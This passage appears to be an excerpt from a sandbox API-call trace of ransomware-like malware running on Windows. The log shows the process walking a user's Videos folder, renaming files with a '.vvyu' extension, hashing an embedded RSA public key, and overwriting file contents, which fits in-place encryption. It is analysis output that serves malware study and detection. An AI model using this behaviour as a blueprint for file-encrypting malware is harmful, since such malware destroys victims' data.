uSVqvA\\F72Mw_KNQRugYJJCcBc\\0iyDFpwaVsJADG.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\0iydfpwavsjadg.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\0iyDFpwaVsJADG.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\0iydfpwavsjadg.mkv.vvyu")) returned 1 [0196.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0196.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.141] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0196.145] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c297610, ftCreationTime.dwHighDateTime=0x1d89c49, ftLastAccessTime.dwLowDateTime=0xfba3c4b0, ftLastAccessTime.dwHighDateTime=0x1d89edb, ftLastWriteTime.dwLowDateTime=0xfba3c4b0, ftLastWriteTime.dwHighDateTime=0x1d89edb, nFileSizeHigh=0x0, nFileSizeLow=0xf15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6cPOSY.swf", cAlternateFileName="")) returned 1 [0196.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2c70bc8 [0196.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.145] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\6cPOSY.swf") returned=".swf" [0196.145] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\6cPOSY.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\6cposy.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0196.146] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=3861) returned 1 [0196.146] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0196.149] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xeef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.149] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0196.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.151] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.151] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xf15, lpOverlapped=0x0) returned 1 [0196.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0196.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.151] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0196.152] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0196.152] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.152] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0196.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0196.152] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0196.153] GetLastError () returned 0x0 [0196.153] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0196.153] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0196.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0196.153] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0196.153] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0196.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.153] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0196.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf20) returned 0x2d3a670 [0196.153] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0196.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0196.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0196.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cd28 [0196.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1e0 [0196.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cd70 [0196.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1f8 [0196.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a228 [0196.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a288 [0196.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a240 [0196.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0196.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0196.154] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0196.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0196.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0196.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0196.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0196.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a288 [0196.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0196.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a240 [0196.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0196.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a228 [0196.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0196.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0196.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0196.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0196.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0196.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0196.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0196.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0196.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0196.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0196.159] GetCurrentThreadId () returned 0x264 [0196.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0196.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d470e0 [0196.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0196.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0196.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0196.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0196.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.160] GetCurrentThreadId () returned 0x264 [0196.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c03ca0 [0196.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0196.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a288 [0196.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a228 [0196.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0196.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0196.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0196.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0196.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a240 [0196.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0196.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0196.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0196.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a210 [0196.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0196.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2a0 [0196.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0196.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a270 [0196.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a258 [0196.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2b8 [0196.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0196.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a258 [0196.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0196.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0196.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0196.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0196.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a228 [0196.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0196.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0196.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b598 [0196.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2d3b7b0 [0196.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0196.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0196.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0196.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0196.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0196.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0196.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0196.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0196.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0196.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b598 | out: hHeap=0x6a0000) returned 1 [0196.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b7b0 | out: hHeap=0x6a0000) returned 1 [0196.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0196.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0196.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0196.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0196.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0196.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0196.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cd70 | out: hHeap=0x6a0000) returned 1 [0196.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0196.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0196.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0196.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0196.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0196.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0196.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0196.172] WriteFile (in: hFile=0x52c, lpBuffer=0x2d3a670*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d3a670*, lpNumberOfBytesWritten=0x30ffb14*=0xf10, lpOverlapped=0x0) returned 1 [0196.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 